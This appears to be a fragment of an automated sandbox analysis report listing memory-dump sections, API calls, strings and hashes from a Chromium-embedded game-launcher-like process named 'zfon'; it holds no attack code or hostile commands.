                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear$cef_get_min_log_level
                                                                                                                                                                            • String ID: browser=$ frame=$ request=$ response.status=$ response.statusText=$?$[OnResourceResponse]$c:\projects\hydra\main\code\contrib\contrib\scene\src\source\cef\client_handler_impl.cpp
                                                                                                                                                                            • API String ID: 2038196646-1385742800
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID: back$forward$reload
                                                                                                                                                                            • API String ID: 2864223729-1381503380
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear$cef_string_utf16_set$cef_string_multimap_keycef_string_multimap_sizecef_string_multimap_valuecef_string_utf16_cmp
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1610809521-0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2864223729-0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear$cef_string_ascii_to_utf16$cef_currently_oncef_time_from_doublet
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3200344510-0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear$cef_shutdown
                                                                                                                                                                            • String ID: c
                                                                                                                                                                            • API String ID: 3945293980-112844655
                                                                                                                                                                            • Opcode ID: cc7572d50cf446b6721c6a399df25483392e0959237572a028bf90dfacc4acc9
                                                                                                                                                                            • Instruction ID: f6405ec7e65916c8ab44e85cebc78e84e19ea8923bc9538d1332130a96c33a2b
                                                                                                                                                                            • Opcode Fuzzy Hash: cc7572d50cf446b6721c6a399df25483392e0959237572a028bf90dfacc4acc9
                                                                                                                                                                            • Instruction Fuzzy Hash: FAD15E23B08A829AFF24EF75D4403AC67B1EB45B88F844035DE4D67A99DF38D515C364
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
• Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID: www.battle.net
                                                                                                                                                                            • API String ID: 2864223729-3493060400
                                                                                                                                                                            • Opcode ID: 6187f425b613d5097de64982bf0571e5230ca0f8ac3ce5cda531ee4b237f0c24
                                                                                                                                                                            • Instruction ID: bb8dce509dfb693f45200c904fbf7f3d81c300f1f32a45c9ca9db5d592027223
                                                                                                                                                                            • Opcode Fuzzy Hash: 6187f425b613d5097de64982bf0571e5230ca0f8ac3ce5cda531ee4b237f0c24
                                                                                                                                                                            • Instruction Fuzzy Hash: 61917023B4964384FF74EB25D0403B9A7B1EB85B94F988531DA8D476A4CF3CE855C720
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2864223729-0
                                                                                                                                                                            • Opcode ID: 297f4fc7d76bde89f4d514584e67cce6bc0e324fbf41e403596e5482c1660c7f
                                                                                                                                                                            • Instruction ID: d2dd9cfb73150b24e0fc8dd71c6ee6341ec0e98fa997fdb2d26850c4fe0cb572
                                                                                                                                                                            • Opcode Fuzzy Hash: 297f4fc7d76bde89f4d514584e67cce6bc0e324fbf41e403596e5482c1660c7f
                                                                                                                                                                            • Instruction Fuzzy Hash: B6F00722A1448B90EEB4FBB0E4D29F85321AF64B14FC40931D60D850DB9F14DD57C3A1
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2864223729-0
                                                                                                                                                                            • Opcode ID: 24952cdb2a72154fed4a212a990a3a1018c8566a43075a85daee53fbdbeba300
                                                                                                                                                                            • Instruction ID: 39987fc6b7961b4850b2eb658fb8164bd375eeb9d267892952a895c9a031bbc3
                                                                                                                                                                            • Opcode Fuzzy Hash: 24952cdb2a72154fed4a212a990a3a1018c8566a43075a85daee53fbdbeba300
                                                                                                                                                                            • Instruction Fuzzy Hash: A2914D22B09A1785FF20EBB8D8903BC6772AF85B58F944131DE4D676A9DF38D845C360
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID: document.body.scrollLeft = $document.body.scrollTop =
                                                                                                                                                                            • API String ID: 2864223729-1848242717
                                                                                                                                                                            • Opcode ID: 063d5a371850d943b3a793401029a2b591f2405daa0d756e103ce80683033bc1
                                                                                                                                                                            • Instruction ID: 5ea6efe9066405865dedbdc8b8d0dfcedcf80521cb4926afdf0de2fb62322c7c
                                                                                                                                                                            • Opcode Fuzzy Hash: 063d5a371850d943b3a793401029a2b591f2405daa0d756e103ce80683033bc1
                                                                                                                                                                            • Instruction Fuzzy Hash: B2717333708A8285EF20AB75E4503AEA772FB85B84F845136EA8D47A99DF3CD545C710
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2864223729-0
                                                                                                                                                                            • Opcode ID: 3172e399ba896f2375b6c67c0f11b0d6cee9284634a0a73235df06711df15462
                                                                                                                                                                            • Instruction ID: c2fef3cdee3433f4d584d73bfa7441a96ad8af2eda433f09463bfa952c0e2f04
                                                                                                                                                                            • Opcode Fuzzy Hash: 3172e399ba896f2375b6c67c0f11b0d6cee9284634a0a73235df06711df15462
                                                                                                                                                                            • Instruction Fuzzy Hash: 76F01422A1448A91EE70FBB4E4925FC5232AB54724FC41E31D60D8509B9F18DD5783A1
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2864223729-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Name::operator+$NameName::
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 168861036-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_$Lockit::~_$Concurrency::cancel_current_taskFacet_GetctypeRegister
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3084244483-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
• Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID: clear$writeCertHolder$writeUrl
                                                                                                                                                                            • API String ID: 2864223729-602964746
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __std_exception_copy$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID: "$/
                                                                                                                                                                            • API String ID: 946306463-2662438755
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
• Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Concurrency::cancel_current_task$Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2973761340-0
                                                                                                                                                                            • Opcode ID: bf22bb379a8e7632d8d336ecfe290394dbc84d542f62b966fb0ca8af05395837
                                                                                                                                                                            • Instruction ID: b007465a430a423464bf0b8faf4e08bf471b9634f0a21841e2bbcdb7bc947e4e
                                                                                                                                                                            • Opcode Fuzzy Hash: bf22bb379a8e7632d8d336ecfe290394dbc84d542f62b966fb0ca8af05395837
                                                                                                                                                                            • Instruction Fuzzy Hash: 9F71A070918A1D8BEF65EF58C8157EE77F1EF18708F00015AA895E7A96DA32D805CBC2
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear$cef_string_utf16_set
                                                                                                                                                                            • String ID: writeCertHolder
                                                                                                                                                                            • API String ID: 255155458-1003169611
                                                                                                                                                                            • Opcode ID: d0a7c4daa1f959a05897b3b2dcf5f3f1fe2954a2e7fa7dbed87265f6e0748687
                                                                                                                                                                            • Instruction ID: 2190a869d31918c829a51d82ebd2e46986ac144a9d6c5ae4b3aec6547ad950a2
                                                                                                                                                                            • Opcode Fuzzy Hash: d0a7c4daa1f959a05897b3b2dcf5f3f1fe2954a2e7fa7dbed87265f6e0748687
                                                                                                                                                                            • Instruction Fuzzy Hash: D2128023B09A4284EF20EF75D4943ADA7B2EB44B94F949436DE4E57BA9DF38D444C310
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __std_exception_copy_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID: &$/
                                                                                                                                                                            • API String ID: 1109970293-2578988991
                                                                                                                                                                            • Opcode ID: be6b46890b10a345fbdaeb7d30acd3836647471af38061ebdf142676a04330be
                                                                                                                                                                            • Instruction ID: 2a1cccfc6ab3b83a6a5ba64eb9f26c812a168346c8aa785db829135d3e2ff3d1
                                                                                                                                                                            • Opcode Fuzzy Hash: be6b46890b10a345fbdaeb7d30acd3836647471af38061ebdf142676a04330be
                                                                                                                                                                            • Instruction Fuzzy Hash: 1A31B670528A8C8FE745EF28C48876AB7E0FBA9308F50565EF489D3261DB76D5C4CB06
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            • var __scInternalExt = __scInternalExt || {};__scInternalExt.CustomScrollbar = function(activeCssColor, inactiveCssColor, widthCss, paddingCss) { activeCssColor = activeCssColor || 'rgba(89,115,143,1.0)'; inactiveCssColor = inactiveCssColor || 'rgba(51,74,99,, xrefs: 00007FF79CFCEC1F
                                                                                                                                                                            • scene/custom-scrollbars, xrefs: 00007FF79CFCEC31
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
